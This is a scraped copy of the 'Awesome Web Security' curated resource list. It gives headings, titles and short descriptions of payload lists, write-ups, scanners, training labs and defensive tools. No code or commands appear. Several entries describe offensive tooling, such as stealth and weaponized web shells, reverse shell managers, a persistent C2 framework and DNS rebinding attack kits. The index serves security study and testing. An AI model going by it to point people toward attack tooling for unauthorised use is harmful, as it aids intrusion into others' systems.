Your first time on this page? Allow me to give some explanations.
Awesome Web Security
🐶 A curated list of Web Security materials and resources.
Here you can see meta information about this topic like the time we last updated this page, the original creator of the awesome list and a link to the original GitHub repository.
Thank you qazbnm456 & contributors
View Topic on GitHub:
qazbnm456/awesome-web-security
Search for resources by name or description.
Simply type in what you are looking for and the results will be filtered on the fly.
Further filter the resources on this page by type (repository/other resource), number of stars on GitHub and time of last commit in months.
Digests
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Written by Netsparker.
A weekly distillation of the best security tools, blog posts, and conference talks, covering AppSec, cloud and container security, DevSecOps, and more.
Forums
XSS - Cross-Site Scripting
HTML5 Security Cheatsheet - A collection of HTML5 related XSS attack vectors
Awesome XSS stuff
A XSS mind map ;)
🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Written by Google.
Prototype Pollution
Content released at NorthSec 2018 for my talk on prototype pollution
Written by @securitymb.
CSV Injection
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Written by Andy.
SQL Injection
🎯 SQL Injection Payload List
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Command Injection
The Ruby Programming Language [mirror]
🎯 Command Injection Payload List
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
ORM Injection
Written by @_m0bius.
Written by Mikhail Egorov.
FTP Injection
Written by Timothy Morgan.
XXE - XML eXternal Entity
🎯 XML External Entity (XXE) Injection Payload List
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Written by portswigger.
Written by Timothy D. Morgan and Omar Al Ibrahim.
CSRF - Cross-Site Request Forgery
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Clickjacking
SSRF - Server-Side Request Forgery
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Web Cache Poisoning
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Relative Path Overwrite
Written by The Morning Paper.
Open Redirect
🎯 Open Redirect Payload List
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Security Assertion Markup Language (SAML)
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Written by epi.
Written by epi.
Upload
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Rails
Checklist of security precautions for Ruby on Rails applications.
AngularJS
Written by Gareth Heyes.
ReactJS
SSL/TLS
🔐 Tutorial of setting up Security for your API with one way authentication with TLS/SSL and mutual mutual authentication for a java based web server and a client with both Spring Boot. Different clients are provided such as Apache HttpClient, OkHttp, Spring RestTemplate, Spring WebFlux WebClient Jetty and Netty, the old and the new JDK HttpClient, the old and the new Jersey Client, Google HttpClient, Unirest, Retrofit, Feign, Methanol, vertx, Scala client Finagle, Featherbed, Dispatch Reboot, AsyncHttpClient, Sttp, Akka, Requests Scala, Http4s Blaze, Kotlin client Fuel, http4k, Kohttp and ktor. Also other server examples are available such as jersey with grizzly.
Webmail
NFS
AWS
Written by Dwight Hohnstein from Rhino Security Labs.
Written by VirtueSecurity.
Written by VirtueSecurity.
Azure
Written by @rhinobenjamin.
Sub Domain Enumeration
Written by Bharath.
Crypto
A lot ready to use best practice examples for securing web servers and more.
Web Shell
OSINT
DNS Rebinding
Written by @brannondorsey
Deserialization
OAuth
Written by @PhilippeDeRyck.
JWT
XXE
CSP
WAF
JSMVC
Authentication
CSRF
Stealing CSRF tokens with CSS injection (without iFrames)
Written by @riyazwalikar.
Written by @rramgattie.
Clickjacking
Remote Code Execution
Written by [email protected] 404 Team.
Written by @breenmachine.
Written by OpSecX.
Written by Ambionics Security.
Written by @capacitorset.
Written by @iblue.
Written by RIPS Technologies.
Written by Orange.
Written by Ezequiel Pereira.
XSS
Written by Jorge Lajara.
Written by HAHWUL.
Written by @garethheyes.
Written by @terjanq.
Written by kenziy.
Written by Mario Heiderich.
Written by @marin_m.
Written by Sebastian Lekies, Krzysztof Kotowicz, and Eduardo Vela.
Written by Michał Bentkowski.
Written by Michał Bentkowski.
SQL Injection
NoSQL Injection
FTP Injection
Written by @a66at and Alexey Osipov.
XXE
Written by Rose Jackcode.
Written by @a66at and Alexey Osipov.
Written by Ivan Novikov.
Written by skavans.
Written by Timothy D. Morgan.
Written by Renaud Dubourguais.
Written by Antti Rantasaari.
Written by Arseniy Sharoglazov.
SSRF
Web Cache Poisoning
Written by @albinowax.
Header Injection
URL
Written by Xudong Zheng.
Deserialization
OAuth
Others
documentation and writing
Written by @alex.birsan.
Frontend (like SOP bypass, URL spoofing, and something like that)
Written by @shhnjk.
Written by @filedescriptor.
Written by @rafaybaloch.
Written by jameshfisher.
Written by portswigger.
Written by James Lee.
Written by Manuel.
Written by aaj at google.com and mkwst at google.com.
Written by Michał Bentkowski.
Written by David Gilbertson.
Written by @kinugawamasato.
Backend (core of Browser implementation, and often refers to C or C++ part)
Written by [email protected].
Written by SecuriTeam Secure Disclosure (SSD).
Written by @moritzj.
Written by @wanderingglitch.
Written by RET2 SYSTEMS, INC.
Written by Diary of a reverse-engineer.
Database
A collection of JavaScript engine CVEs with PoCs
✍️ A curated list of CVE PoCs.
各种漏洞poc、Exp的收集或编写
🔪Browser logic vulnerabilities
Cheetsheets
CTF Cheatsheet
Auditing
Prowler is a security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness. It contains all CIS controls listed here https://d0.awsstatic.com/whitepapers/compliance/AWS_CIS_Foundations_Benchmark.pdf and more than 100 additional checks that help on GDPR, HIPAA and other security requirements.
Auto Scanning to SSL Vulnerability
Command Injection
Automated All-in-One OS command injection and exploitation tool.
OSINT - Open-Source Intelligence
Incredibly fast crawler designed for OSINT.
Tool to find metadata and hidden information in the documents.
XRay is a tool for recon, mapping and OSINT gathering from public networks.
Reconnaissance tool for GitHub organizations
GitHub Sensitive Information Leakage(GitHub敏感信息泄露监控)
raven is a Linkedin information gathering tool that can be used by pentesters to gather information about an organization employees using Linkedin.
Reconnaissance Swiss Army Knife
The most complete open-source tool for Twitter intelligence analysis
A high performance offensive security tool for reconnaissance and vulnerability scanning
A Social Media Enumeration & Correlation Tool by Jacob Wilkin(Greenwolf)
Shodan is the world's first search engine for Internet-connected devices by @shodanhq.
Censys is a search engine that allows computer scientists to ask questions about the devices and networks that compose the Internet by University of Michigan.
Open source footprinting and intelligence-gathering tool by @binarypool.
Various databases which you can use for your OSINT research by @technisette.
Sub Domain Enumeration
Fast subdomains enumeration tool for penetration testers
EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible.
A fast sub domain brute tool for pentesters
A Tool for Domain Flyovers
Analyze the security of any domain by finding all the information possible. Made in python.
Auditing for TLS certificates.
A domain searcher named GoogleSSLdomainFinder - 基于谷歌SSL透明证书的子域名查询工具
Searching for domain information by VirusTotal.
Enter an Identity (Domain Name, Organization Name, etc), a Certificate Fingerprint (SHA-1 or SHA-256) or a crt.sh ID to search certificate(s) by @crtsh.
Code Generating
Vulnerable Web applications Generator
Fuzzing
Web application fuzzer
A script that inspects multi-byte character sets looking for characters with specific user-defined properties
A simple tool to convert the IP to a DWORD IP
DOM fuzzer
Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.
Find web directories without bruteforce
Potentially dangerous files
Online service that performs a deep analysis of the configuration of any SSL web server on the public internet. Provided by Qualys SSL Labs.
Scanning
WPScan WordPress security scanner. Written for security professionals and blog maintainers to test the security of their WordPress websites.
A free software to find the components installed in Joomla CMS, built out of the ashes of Joomscan.
WAScan - Web Application Scanner
Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use.
Penetration Testing
The Offensive Manual Web Application Penetration Testing Framework.
Automated Security Testing For REST API's
A collection of AWS penetration testing junk
Burp Suite is an integrated platform for performing security testing of web applications by portswigger.
XSS - Cross-Site Scripting
The Browser Exploitation Framework Project
JShell - Get a JavaScript shell with XSS.
Most advanced XSS scanner.
XSS'OR - Hack with JavaScript.
SQL Injection
Automatic SQL injection and database takeover tool
Template Injection
Server-Side Template Injection and Code Injection Detection and Exploitation Tool
XXE
List DTDs and generate XXE payloads using those local DTDs.
Cross Site Request Forgery
The Prime Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit.
Server-Side Request Forgery
Open redirect/SSRF payload generator by intigriti.
Leaking
HTTPLeaks - All possible ways, a website can leak HTTP requests
Rip web accessible (distributed) version control systems: SVN/GIT/HG...
Pillage web accessible GIT, HG and BZR repositories
Tool for advanced mining for content on Github
Scan git repos (or files) for secrets using regex and entropy 🔑
Chrome extension and Express server that exploits keylogging abilities of CSS.
Git manager for pentesters
Tool to scan for secret files on HTTP servers
A python script that finds endpoints in JavaScript files
Detecting
scanner detecting the use of JavaScript libraries with known vulnerabilities
Sandbox for semi-automatic Javascript malware analysis, deobfuscation and payload extraction. Written for Node.js
Scan your code for security misconfiguration, search for passwords and secrets.
bXSS is a utility which can be used by bug hunters and organizations to identify Blind Cross-Site Scripting.
🔥Open source RASP solution
Preventing
DOMPurify - a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. DOMPurify works with a secure default, but offers a lot of configurability and hooks. Demo:
Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist
Database security suite. Database proxy with field-level encryption, search through encrypted data, SQL injections prevention, intrusion detection, honeypots. Supports client-side and proxy-side ("transparent") encryption. SQL, NoSQL.
A set of tools for building/evaluating/monitoring content-security-policy to prevent/detect cross site scripting by Csper.
Proxy
An interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.
HTTP proxy / HTTP monitor / Reverse Proxy that enables a developer to view all of the HTTP and SSL / HTTPS traffic between their machine and the Internet.
Webshell
Nano is a family of PHP web shells which are code golfed for stealth.
This is a webshell open source project
Weaponized web shell
Manage your website via terminal
A multiple reverse shell session/client manager via terminal
Reverse Shell as a Service
Full-featured C2 framework which silently persists on webserver via evil PHP oneliner
Disassembler
Plasma is an interactive disassembler for x86/ARM/MIPS. It can generates indented pseudo-code with colored syntax.
UNIX-like reverse engineering framework and command-line toolset
This project has been moved to:
Decompiler
DNS Rebinding
A front-end JavaScript toolkit for creating DNS rebinding attacks.
DNS Rebinding Exploitation Framework
A DNS rebinding attack framework.
A "malicious" DNS server for executing DNS Rebinding attacks on the fly (public instance running on rebind.network:53)
Others
The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
Parse NTLM challenge messages over HTTP and SMB
Minimal code to connect to a CEF debugger.
Interactive CTF Exploration Tool
Social Engineering Database
Check if you have an account that has been compromised in a data breach by Troy Hunt.
Blogs
Twitter Users
Initiative to showcase open source hacking tools for hackers and pentesters
Active penetrator often tweets and writes useful articles
Cure53](https://cure53.de/) is a German cybersecurity firm.
The wonderland of JavaScript unexpected usages, and more.
Security Researcher, interested in web security, crypto, pentest, static analysis but most of all, samy is my hero.
Application
OWASP Juice Shop: Probably the most modern and sophisticated insecure web application
vulnerable web application for training
Learn SELinux by doing. Solve Puzzles, show skillz - Written by @selinuxgame.
Free trainings and labs - Written by PortSwigger.
AWS
CloudGoat is Rhino Security Labs' "Vulnerable by Design" AWS deployment tool
XSS
ModSecurity / OWASP ModSecurity Core Rule Set
Series of tutorials to install, configure and tune ModSecurity and the Core Rule Set - Written by @ChrFolini.
Community
Miscellaneous
A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups.
Inspired by https://github.com/djadmin/awesome-bug-bounty, a list of bug bounty write-up that is categorized by the bug nature
Decrypted content of eqgrp-auction-file.tar.xz
Some public notes
An Information Security Reference That Doesn't Suck
Written by Daniel Stelter-Gliese.
Written by PwnDizzle.
Penetration Testing and Exploit Dev CheatSheet.
Written by @gregose.
Check if your internet-connected devices at home are public on Shodan by BullGuard.
Written by Ezequiel Pereira.
Written by @fransrosen.
Written by voidsec.
Written by Chris Patten, Tom Steele.
Written by @umpox.
Written by sigpwn.
Written by Ruslan Habalov.
Written by Paul Dannewitz.
Written by @AntoGarand.
Written by @gergoturcsanyi.
Written by @0daywork.
Written by Jayson.
Written by David Scrobonia.
Written by @slashcrypto.
Written by Gwen.
Written by Brian Wallace.
Written by @sandrogauci.